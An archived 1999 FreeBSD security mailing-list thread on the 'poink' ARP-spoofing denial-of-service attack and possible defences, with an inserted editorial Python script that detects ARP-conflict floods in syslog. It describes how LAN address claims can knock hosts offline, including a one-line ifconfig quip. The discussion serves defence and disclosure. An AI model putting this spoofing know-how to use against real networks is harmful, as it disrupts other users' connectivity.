: are vulnerable. The Solaris box just couldn't access anything outside its
: own network after that.

Define vulnerable.
ARP has no security in it whatsoever[*], so there is *NO* way to
effectively defend against this attack w/o keeping a database of NIC
addresses in sync with IP addresses. ARP does this dynamically so you can
swap out ethernet cards and the like w/o major headache.

To work around this attack is fairly simple: just add arp entries by hand
(they will be permanent) when you boot your clients.

Warner

[*] Apart from the implicit trust of all machines on a physical wire.

From owner-freebsd-security Mon Apr 19 14:13:59 1999
Delivered-To: freebsd-security@freebsd.org
Received: from biggusdiskus.flyingfox.com (parker-T1-2-gw.sf3d.best.net [209.157.165.30]) by hub.freebsd.org (Postfix) with ESMTP id 1951E1545B for ; Mon, 19 Apr 1999 14:13:52 -0700 (PDT) (envelope-from jas@flyingfox.com)
Received: (from jas@localhost) by biggusdiskus.flyingfox.com (8.8.8/8.8.5) id PAA04114; Mon, 19 Apr 1999 15:15:25 -0700 (PDT)
Date: Mon, 19 Apr 1999 15:15:25 -0700 (PDT)
From: Jim Shankland
Message-Id: <199904192215.PAA04114@biggusdiskus.flyingfox.com>
To: camposr@MATRIX.COM.BR, imp@harmony.village.org
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
Cc: liam@tiora.net, nicole@ispchannel.net, security@FreeBSD.ORG
In-Reply-To: <199904192059.OAA27640@harmony.village.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Warner Losh writes:

> Define vulnerable. ARP has no security in it whatsoever[*], so there
> is *NO* way to effectively defend against this attack w/o keeping a
> database ....

Bingo. Note the close cousin of poink, the "ifconfig attack":

	ifconfig fxp0

And you don't even need libnet, or whatever it was called.

Jim Shankland
NLynx Systems, Inc.
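Rajit's log excerpt and Chris's "every 10 seconds" scenario above are the raw material a defender actually has, since ARP itself offers nothing to filter on. The following is an added example, not code from anyone in this thread: a small parser that turns the FreeBSD kernel's "arp: ... is using my IP address ...!" messages (together with syslogd's "last message repeated N times" compression) into per-claimant burst counts and separates a one-off collision from a sustained flood. The message format, the year, the hostname "victim", the MACs and the 192.0.2.0/24 addresses in the sample log are assumptions or constructed for illustration.

```python
"""Flag sustained ARP-conflict floods in FreeBSD kernel syslog output.

Added example for this thread, not code from any of the posters. It assumes
the FreeBSD 3.x kernel message format "arp: <mac> is using my IP address
<ip>!" and syslogd's "last message repeated N times" compression; the log
lines in SAMPLE_LOG are constructed for illustration (192.0.2.0/24 is the
documentation range; the MACs and the hostname are made up).
"""
import re
from collections import defaultdict
from datetime import datetime

# Kernel ARP conflict message as it reaches syslog. The hostname field is
# optional because archived logs (like the one quoted in the thread) often
# strip it; FreeBSD prints MAC bytes without zero padding (e.g. 0:a0:c9:...).
ARP_CONFLICT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) (?:\S+ )?/kernel: "
    r"arp: (?P<mac>(?:[0-9a-f]{1,2}:){5}[0-9a-f]{1,2}) is using my IP address "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})!"
)
# syslogd collapses consecutive identical messages into this line.
REPEAT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) (?:\S+ )?"
    r"last message repeated (?P<n>\d+) times$"
)

LOG_YEAR = 1999  # syslog timestamps carry no year; assumed for parsing

# A single burst (one misconfigured host plugging in, or one poink run) is
# a nuisance; bursts that keep coming, as in the "every 10 seconds" scenario
# from the thread, are the case worth paging someone for.
SUSTAINED_MIN_BURSTS = 3
SUSTAINED_MIN_SPAN_S = 20.0


def _parse_ts(text):
    return datetime.strptime(f"{LOG_YEAR} {text}", "%Y %b %d %H:%M:%S")


def parse_arp_conflicts(lines):
    """Return {(mac, ip): [(timestamp, announcements), ...]}.

    Each kernel message starts a burst of 1; a following "last message
    repeated N times" line adds N to that burst, but only when the ARP
    message was the immediately preceding line, which is how syslogd
    attributes the repeat count.
    """
    bursts = defaultdict(list)
    last_key = None
    for line in lines:
        m = ARP_CONFLICT_RE.match(line)
        if m:
            last_key = (m["mac"], m["ip"])
            bursts[last_key].append([_parse_ts(m["ts"]), 1])
            continue
        m = REPEAT_RE.match(line)
        if m and last_key is not None:
            bursts[last_key][-1][1] += int(m["n"])
        last_key = None  # any other line breaks the repeat chain
    return {key: [tuple(b) for b in v] for key, v in bursts.items()}


def classify_conflicts(lines):
    """Summarise every (claiming MAC, our IP) pair seen in the log lines."""
    report = {}
    for key, events in parse_arp_conflicts(lines).items():
        times = [t for t, _ in events]
        span = (max(times) - min(times)).total_seconds()
        sustained = (len(events) >= SUSTAINED_MIN_BURSTS
                     and span >= SUSTAINED_MIN_SPAN_S)
        report[key] = {
            "bursts": len(events),
            "announcements": sum(n for _, n in events),
            "span_s": span,
            "verdict": "sustained" if sustained else "transient",
        }
    return report


# Constructed sample: one host hammering us every ten seconds, an unrelated
# ypbind complaint in between (as Rajit saw), and one later one-off conflict.
SAMPLE_LOG = """\
Apr 19 14:39:32 victim /kernel: arp: 0:a0:c9:12:34:56 is using my IP address 192.0.2.10!
Apr 19 14:39:32 victim last message repeated 16 times
Apr 19 14:39:33 victim ypbind[71]: NIS server [192.0.2.20] for domain "lab" not responding
Apr 19 14:39:42 victim /kernel: arp: 0:a0:c9:12:34:56 is using my IP address 192.0.2.10!
Apr 19 14:39:42 victim last message repeated 16 times
Apr 19 14:39:52 victim /kernel: arp: 0:a0:c9:12:34:56 is using my IP address 192.0.2.10!
Apr 19 14:40:02 victim /kernel: arp: 0:a0:c9:12:34:56 is using my IP address 192.0.2.10!
Apr 19 14:40:02 victim last message repeated 2 times
Apr 19 15:10:05 victim /kernel: arp: 8:0:20:aa:bb:cc is using my IP address 192.0.2.10!
Apr 19 15:10:05 victim last message repeated 2 times
"""

if __name__ == "__main__":
    for (mac, ip), info in classify_conflicts(SAMPLE_LOG.splitlines()).items():
        print(f"{mac} claims {ip}: {info['verdict']} "
              f"({info['bursts']} bursts, {info['announcements']} announcements "
              f"over {info['span_s']:.0f}s)")
```

The claimant MAC in the report is only as trustworthy as the frame that carried it, which, as Warner notes, can be anything the sender's card allows; the value of the output is the pattern over time, not the identity.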
From owner-freebsd-security Mon Apr 19 14:17:45 1999
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 1CB7D14D11 for ; Mon, 19 Apr 1999 14:17:23 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id XAA05984; Mon, 19 Apr 1999 23:14:56 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id XAA20358; Mon, 19 Apr 1999 23:14:50 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Warner Losh
Cc: Rajit Manohar, security@FreeBSD.ORG
Subject: Re: poink and freebsd
In-reply-to: Your message of "Mon, 19 Apr 1999 14:54:56 MDT." <199904192054.OAA27522@harmony.village.org>
Date: Mon, 19 Apr 1999 23:14:50 +0200
Message-ID: <20356.924556490@critter.freebsd.dk>
From: Poul-Henning Kamp

In message <199904192054.OAA27522@harmony.village.org>, Warner Losh writes:
>In message <199904191854.OAA02778@mozart.csl.cornell.edu> Rajit Manohar writes:
>: about a minute, everything returned to normal (AFAIK). I'd guess that
>: a repeated-poink, or a poink of an nfs server would be a more serious
>: problem.
>
>Sounds like your typical "Let's claim to be someone else and confuse
>everybody" DOS that has been well known since at least the late 80's,
>if not before. arp has no authentication in it, so short of hard
>wiring the arp cache on all your machines, I don't think there is much
>that can be done about this.

Actually there is. Instead of bailing in this case, send the originator an arp packet and ask if they're serious. If they don't answer, ignore the entire event.
--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon Apr 19 17:30:36 1999
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 6138D14C10 for ; Mon, 19 Apr 1999 17:30:33 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id UAA23674; Mon, 19 Apr 1999 20:28:03 -0400 (EDT)
From: mike@sentex.net (Mike Tancsa)
To: imp@harmony.village.org (Warner Losh)
Cc: security@FreeBSD.ORG
Subject: Re: poink and freebsd
Date: Tue, 20 Apr 1999 00:37:43 GMT
Message-ID: <371bcc18.1480010513@mail.sentex.net>
References: <199904191854.OAA02778@mozart.csl.cornell.edu>
In-Reply-To:
X-Mailer: Forte Agent .99e/32.227

>Sounds like your typical "Let's claim to be someone else and confuse
>everybody" DOS that has been well known since at least the late 80's,
>if not before. arp has no authentication in it, so short of hard
>wiring the arp cache on all your machines, I don't think there is much
>that can be done about this. Even detecting that it is going on and

Would not a switch that lets you hard code allowed mac addresses help in this case?
---Mike

Mike Tancsa (mdtancsa@sentex.net)
Sentex Communications Corp, Waterloo, Ontario, Canada

From owner-freebsd-security Mon Apr 19 17:34:53 1999
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id B5C5414D21 for ; Mon, 19 Apr 1999 17:34:49 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id SAA60390; Mon, 19 Apr 1999 18:32:05 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA30038; Mon, 19 Apr 1999 18:32:04 -0600 (MDT)
Message-Id: <199904200032.SAA30038@harmony.village.org>
To: mike@sentex.net (Mike Tancsa)
Subject: Re: poink and freebsd
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Tue, 20 Apr 1999 00:37:43 GMT." <371bcc18.1480010513@mail.sentex.net>
References: <371bcc18.1480010513@mail.sentex.net> <199904191854.OAA02778@mozart.csl.cornell.edu>
Date: Mon, 19 Apr 1999 18:32:04 -0600
From: Warner Losh

In message <371bcc18.1480010513@mail.sentex.net> Mike Tancsa writes:
: Would not a switch that lets you hard code allowed mac addresses help in
: this case ?

You mean like arp -S host 1:2:3:4:5:6 pub?
Warner

From owner-freebsd-security Mon Apr 19 19:10: 7 1999
Received: from bogomatic.fredbox.com (cable-4-17-237-24.anchorageak.net [24.237.17.4]) by hub.freebsd.org (Postfix) with ESMTP id ADE601563D for ; Mon, 19 Apr 1999 19:09:55 -0700 (PDT) (envelope-from fred@fredbox.com)
Received: from localhost (fred@localhost) by bogomatic.fredbox.com (8.8.8/8.8.8) with ESMTP id SAA13364; Mon, 19 Apr 1999 18:07:09 -0800 (AKDT) (envelope-from fred@fredbox.com)
Date: Mon, 19 Apr 1999 18:07:09 -0800 (AKDT)
From: "Frederick J Polsky v1.0"
To: Rodrigo Campos
Cc: Liam Slusser, security@FreeBSD.ORG
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Unfortunately in my case (and the case of others), I'm served with cable internet through GCI cable in Anchorage AK, which has its cable network set up such that it is just one large ethernet with some 1000+ users and no security whatsoever (most entertaining to connect a winbox to the network and click on Network Neighborhood and see all defined domains/workgroups...) I don't know about other cable internet providers but this would at least be a problem with mine.

> I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable, all
> they are vulnerable, it's not a big threat anyway, as you have to be on
> the same ethernet to use the exploit.
From owner-freebsd-security Mon Apr 19 19:29:36 1999
Received: from smtp1.andrew.cmu.edu (SMTP1.ANDREW.CMU.EDU [128.2.10.81]) by hub.freebsd.org (Postfix) with ESMTP id 59E2814F83 for ; Mon, 19 Apr 1999 19:29:30 -0700 (PDT) (envelope-from Harry_M_Leitzell@cmu.edu)
Received: from unix48.andrew.cmu.edu (UNIX48.ANDREW.CMU.EDU [128.2.15.56]) by smtp1.andrew.cmu.edu (8.8.5/8.8.2) with SMTP id WAA08271; Mon, 19 Apr 1999 22:26:50 -0400 (EDT)
Date: Mon, 19 Apr 1999 22:26:49 -0400 (EDT)
From: "Harry M. Leitzell"
X-Sender: Harry_M_Leitzell@unix48.andrew.cmu.edu
Reply-To: "Harry M. Leitzell"
To: "Frederick J Polsky v1.0"
Cc: security@FreeBSD.ORG
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

It also hits college campuses, which are a haven for misconfigured Linux machines that provide easy quick root access on the local network. Not to say that CMU has this problem or anything like that.

On Mon, 19 Apr 1999, Frederick J Polsky v1.0 wrote:

> Unfortunately in my case (and the case of others), I'm served with cable
> internet through GCI cable in Anchorage AK, which has its cable network
> set up such that it is just one large ethernet with some 1000+ users and
> no security whatsoever (most entertaining to connect a winbox to the
> network and click on Network Neighborhood and see all defined
> domains/workgroups...) I don't know about other cable internet providers
> but this would at least be a problem with mine.
>
> > I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable, all
> > they are vulnerable, it's not a big threat anyway, as you have to be on
> > the same ethernet to use the exploit.
> >
>

[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]
Harry M. Leitzell - Harry_M_Leitzell@cmu.edu
Carnegie Mellon University
Finger for PGP Public Key
[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]

From owner-freebsd-security Tue Apr 20 5:59:50 1999
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 98C3814DB1 for ; Tue, 20 Apr 1999 05:59:47 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA01738; Tue, 20 Apr 1999 06:00:44 -0700
Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda01736; Tue Apr 20 06:00:23 1999
Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id FAA64167; Tue, 20 Apr 1999 05:56:55 -0700 (PDT)
Message-Id: <199904201256.FAA64167@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdU64161; Tue Apr 20 05:56:48 1999
X-Mailer: exmh version 2.0.2 2/24/98
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 2.2.8-RELEASE
X-Sender: cy
To: Chris
Cc: The Tech-Admin Dude, security@FreeBSD.ORG
Subject: Re: poink and freebsd
In-reply-to: Your message of "Mon, 19 Apr 1999 13:10:08 EDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 20 Apr 1999 05:56:48 -0700

Why not send a copy to security-officer@freebsd.org. Then it can be fixed.
Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Open Systems Group          Internet:  Cy.Schubert@uumail.gov.bc.ca
ITSD                                   Cy.Schubert@gems8.gov.bc.ca
Province of BC
            "e**(i*pi)+1=0"

In message , Chris writes:
> jd-
>
> id rather not post the source to the list, since this is how exploits get
> distributed, and bad things occur. i sent email to the security-officer,
> and a few people to test it out with their setup.. id rather not
> distribute it any further... i hope you understand my reasoning behind it
> :/
>
> -Chris O'Hara
> Systems Administration
>
> On Mon, 19 Apr 1999, The Tech-Admin Dude wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Better yet, post a copy to the mailing list :-).. I have heard of it, but
> > i have not tried it nor seen the effects of it.. post the source up here..
> > Thanks
> >
> > - -JD-
> >
> > On Mon, 19 Apr 1999, Robert Watson wrote:
> >
> > > On Mon, 19 Apr 1999, Chris wrote:
> > >
> > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd
> > > > machines (these are the boxes i have tested on) it appears to work very
> > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of
> > > > our freebsd 2.2.5 machines, it did bring up the error messages in
> > > > /var/log/messages (arp lookups) but didnt kill the machine like the
> > > > others...
> > > >
> > > > im just wondering if there are any patches for this, and i noticed there
> > > > is no mention of it on freebsd's website....
> > >
> > > Interestingly, I haven't heard about this one, and it doesn't appear to be
> > > on rootshell, etc. The only "poink" I could find reference to was an
> > > alternative ping program that doesn't require root access--I assume that
> > > means it uses udp or something to try and get a response (perhaps looking
> > > for a connection refused ICMP except on the socket?).
> > > I may just have
> > > missed it in passing, of course, given the vast quantities of email that
> > > go through around here :-).
> > >
> > > Since it doesn't appear to have been reported, send a copy of the source
> > > to security-officer@freebsd.org, and feel free to CC me a copy so I can
> > > take a look.
> > >
> > > Robert N Watson
> > >
> > > robert@fledge.watson.org              http://www.watson.org/~robert/
> > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
> > >
> > > Carnegie Mellon University            http://www.cmu.edu/
> > > TIS Labs at Network Associates, Inc.  http://www.tis.com/
> > > Safeport Network Services             http://www.safeport.com/
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGPfreeware 5.0i for non-commercial use
> > Charset: noconv
> >
> > iQA/AwUBNxtibtGMB8VPlu8bEQJ/rgCgp469vqIP+XvUBt8E6p+eWv8kM9YAoJVE
> > JPNHwoC9dFTZuubRq8AxjIej
> > =neIQ
> > -----END PGP SIGNATURE-----

From owner-freebsd-security Tue Apr 20 6:43: 6 1999
Received: from mail.rdc1.sdca.home.com (ha1.rdc1.sdca.home.com [24.0.3.66]) by hub.freebsd.org (Postfix) with ESMTP id 10F9914FEA for ; Tue, 20 Apr 1999 06:43:03 -0700 (PDT) (envelope-from jay@doscher.com)
Received: from [192.168.200.3] ([24.4.93.129]) by mail.rdc1.sdca.home.com (InterMail v4.00.03 201-229-104) with ESMTP id <19990420134037.PXIG6760.mail.rdc1.sdca.home.com@[24.4.93.129]> for ; Tue, 20 Apr 1999 06:40:37 -0700
X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410)
Date: Tue, 20 Apr 1999 06:45:59 -0800
Subject: Sample Ipfw scripts?
From: "Jay Doscher"
To: security@FreeBSD.ORG
Mime-version: 1.0
X-Priority: 3
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Message-Id: <19990420134037.PXIG6760.mail.rdc1.sdca.home.com@[24.4.93.129]>

Does anyone have any sample IPfw scripts they would be willing to share? I'm setting up ipfw for the first time (currently using linux) on a freebsd machine and it's a bit confusing :) Thanks.

Jay Doscher
jay@doscher.com

From owner-freebsd-security Tue Apr 20 6:46:18 1999
Received: from 2.hot.cl (node1e2d.a2000.nl [62.108.30.45]) by hub.freebsd.org (Postfix) with ESMTP id AA17814FEA for ; Tue, 20 Apr 1999 06:46:14 -0700 (PDT) (envelope-from niels@hot.cl)
Received: from localhost (niels@localhost) by 2.hot.cl (8.8.8/HOTCL) with ESMTP id PAA29604; Tue, 20 Apr 1999 15:43:14 +0200 (CEST) (envelope-from niels@hot.cl)
Date: Tue, 20 Apr 1999 15:43:13 +0200 (CEST)
From: Niels Kroon
To: Jay Doscher
Cc: security@FreeBSD.ORG
Subject: Re: Sample Ipfw scripts?
In-Reply-To: <19990420134037.PXIG6760.mail.rdc1.sdca.home.com@[24.4.93.129]>
Message-ID:
X-Location: Amsterdam The Netherlands
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Tue, 20 Apr 1999, Jay Doscher wrote:

> Does anyone have any sample IPfw scripts they would be willing to share?
> I'm setting up ipfw for the first time (currently using linux) on a freebsd
> machine and it's a bit confusing :) Thanks.
>
> Jay Doscher
> jay@doscher.com

Check http://www.freebsd.org/~jkb/howto.html; it has a link to a site with sample configs.

Niels

From owner-freebsd-security Tue Apr 20 7:27:19 1999
Received: from maild.telia.com (maild.telia.com [194.22.190.3]) by hub.freebsd.org (Postfix) with ESMTP id 4B7B01578E for ; Tue, 20 Apr 1999 07:27:07 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se)
Received: from d1o68.telia.com (root@d1o68.telia.com [62.20.138.241]) by maild.telia.com (8.8.8/8.8.8) with ESMTP id QAA09078; Tue, 20 Apr 1999 16:24:38 +0200 (CEST)
Received: from tu (t1o68p22.telia.com [62.20.138.22]) by d1o68.telia.com (8.8.8/8.8.5) with SMTP id QAA11737; Tue, 20 Apr 1999 16:24:37 +0200 (CEST)
Received: by localhost with Microsoft MAPI; Tue, 20 Apr 1999 16:20:43 +0200
Message-ID: <01BE8B49.BD40B300.thomas.uhrfelt@plymovent.se>
From: Thomas Uhrfelt
Reply-To: "thomas.uhrfelt@plymovent.se"
To: "'Jay Doscher'"
Cc: "'freebsd-security@freebsd.org'"
Subject: SV: Sample Ipfw scripts?
Date: Tue, 20 Apr 1999 16:15:36 +0200
Organization: Plymovent AB
X-Mailer: Microsoft Internet-e-post/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

You might want to take a look at the FreeBSD IPFW Config page below, but I don't think the scripts are very good, so if you find a better source, be sure to send it to me as well *hint hint*

Regards,
Thomas Uhrfelt

http://www.metronet.com/~pgilley/freebsd/ipfw/

> Does anyone have any sample IPfw scripts they would be willing to share?
> I'm setting up ipfw for the first time (currently using linux) on a freebsd
> machine and it's a bit confusing :) Thanks.
>
> Jay Doscher
> jay@doscher.com

From owner-freebsd-security Tue Apr 20 7:57:56 1999
Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id E551014E59 for ; Tue, 20 Apr 1999 07:57:53 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca)
Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id KAA28930; Tue, 20 Apr 1999 10:55:23 -0400 (EDT)
From: David Gilbert
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14108.38235.254919.924353@trooper.velocet.ca>
Date: Tue, 20 Apr 1999 10:55:23 -0400 (EDT)
To: "Harry M. Leitzell"
Cc: "Frederick J Polsky v1.0", security@FreeBSD.ORG
Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT)
In-Reply-To:
References:
X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid

>>>>> "Harry" == Harry M Leitzell writes:

Harry> It also hits college campuses, which are a haven for
Harry> misconfigured Linux machines that provide easy quick root
Harry> access on the Local network. Not to say that CMU has this
Harry> problem or anything like that.

Not that this discussion 'should' be about what 'should' be, but wouldn't it make sense to have the DHCP server be the 'authority' by which hardware addresses are resolved? I suppose there's little security built into that protocol, too. We recently went to implement it for a customer and were somewhat taken aback by what could happen if someone managed to just 'connect' a laptop to the network who wasn't supposed to.

Dave.
--
============================================================================
|David Gilbert, Velocet Communications.       | Two things can only be     |
|Mail:       dgilbert@velocet.net             | equal if and only if they  |
|http://www.velocet.net/~dgilbert             | are precisely opposite.    |
=========================================================GLO================

From owner-freebsd-security Tue Apr 20 8:17:35 1999
Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id EEDE61579B for ; Tue, 20 Apr 1999 08:17:33 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com)
Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.8.8) id LAA09694; Tue, 20 Apr 1999 11:15:07 -0400 (EDT) (envelope-from cjc)
From: "Crist J. Clark"
Message-Id: <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com>
Subject: DHCP (was Re: poink attack (was Re: ARP problem in Windows9X/NT))
In-Reply-To: <14108.38235.254919.924353@trooper.velocet.ca> from David Gilbert at "Apr 20, 99 10:55:23 am"
To: dgilbert@velocet.ca (David Gilbert)
Date: Tue, 20 Apr 1999 11:15:07 -0400 (EDT)
Cc: Harry_M_Leitzell@cmu.edu, fred@fredbox.com, security@FreeBSD.ORG
Reply-To: cjclark@home.com
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

David Gilbert wrote,
> Not that this discussion 'should' be about what 'should' be, but wouldn't
> it make sense to have the DHCP server be the 'authority' by which
> hardware addresses are resolved? I suppose there's little security
> built into that protocol, too.
> We recently went to implement it for a
> customer and were somewhat taken aback by what could happen if someone
> managed to just 'connect' a laptop to the network who wasn't supposed
> to.

OK, I'll bite.

What happens when someone who is not supposed to connects to a DHCP served network? (Besides that they are connected to the network and are not supposed to be.)

--
Crist J. Clark                           cjclark@home.com

From owner-freebsd-security Tue Apr 20 8:40:21 1999
Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id 71D2E15774 for ; Tue, 20 Apr 1999 08:40:16 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca)
Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id LAA29968; Tue, 20 Apr 1999 11:37:44 -0400 (EDT)
From: David Gilbert
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14108.40776.605720.29036@trooper.velocet.ca>
Date: Tue, 20 Apr 1999 11:37:44 -0400 (EDT)
To: cjclark@home.com
Cc: dgilbert@velocet.ca (David Gilbert), Harry_M_Leitzell@cmu.edu, fred@fredbox.com, security@FreeBSD.ORG
Subject: DHCP (was Re: poink attack (was Re: ARP problem in Windows9X/NT))
In-Reply-To: <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com>
References: <14108.38235.254919.924353@trooper.velocet.ca> <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com>
X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid

>>>>> "Crist" == Crist J Clark writes:

Crist> OK, I'll bite.

Crist> What happens when someone who is not supposed to connects to a
Crist> DHCP served network? (Besides that they are connected to the
Crist> network and are not supposed to be.) -- Crist J. Clark
Crist> cjclark@home.com

It just lowers the bar.
To attach oneself usefully to a foreign IP network requires some experimentation and/or packet sniffing. On a DHCP network, it's just plug and pray. I suppose it's the difference between running Linux which every script kiddie plays with vs. running FreeBSD (little harder) or HpUX (reasonably obscure).

I'm certainly not one to believe in security by obscurity --- not at least against a knowledgeable attacker. However, there is a correlation between the number of breakins on hosts we (Velocet) monitor and that host's representative population.

DG/UX is likely holey as swiss cheese, but rootshell doesn't have a 'sploit for it.

Back to the original issue: Joe _average_ salesman is sitting in the boardroom... which has a network jack. He's left alone for 30 minutes for one reason or another. He plugs in. Without _any_ knowledge, he's up and running. Of course, if Joe were a hacker worth his salt, this wouldn't be a barrier --- but the likelihood of Joe being a hacker is small.

I think there's a definite range of security issues --- and I think it's ridiculous for most companies to take the standard 'stance' that they must protect themselves against all perils (why then have they not started filtering for whatever that substance is that kills hard drives in a week if it's in the air) on the net. Things range from 'something anyone can do from the other side of the world from a Win95 machine' to 'something a black-belt hacker could do with arbitrary equipment in my machine room' --- an obvious policy is to allocate time/money to security that has the cost/benefit ratio that you choose.

Dave.

--
============================================================================
|David Gilbert, Velocet Communications.       | Two things can only be     |
|Mail:       dgilbert@velocet.net             | equal if and only if they  |
|http://www.velocet.net/~dgilbert             | are precisely opposite.    |
=========================================================GLO================

From owner-freebsd-security Tue Apr 20 8:44:13 1999
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 906AE150A8 for ; Tue, 20 Apr 1999 08:44:01 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA27728; Tue, 20 Apr 1999 11:41:04 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Tue, 20 Apr 1999 11:41:03 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: cjclark@home.com
Cc: David Gilbert, Harry_M_Leitzell@cmu.edu, fred@fredbox.com, security@FreeBSD.ORG
Subject: Re: DHCP (was Re: poink attack (was Re: ARP problem in Windows9X/NT))
In-Reply-To: <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Tue, 20 Apr 1999, Crist J. Clark wrote:

> David Gilbert wrote,
> > Not that this discussion 'should' be about what 'should' be, but wouldn't
> > it make sense to have the DHCP server be the 'authority' by which
> > hardware addresses are resolved? I suppose there's little security
> > built into that protocol, too. We recently went to implement it for a
> > customer and were somewhat taken aback by what could happen if someone
> > managed to just 'connect' a laptop to the network who wasn't supposed
> > to.
>
> OK, I'll bite.
>
> What happens when someone who is not supposed to connects to a DHCP
> served network? (Besides that they are connected to the network and are
> not supposed to be.)

Well, the quick answer would be denial of service.
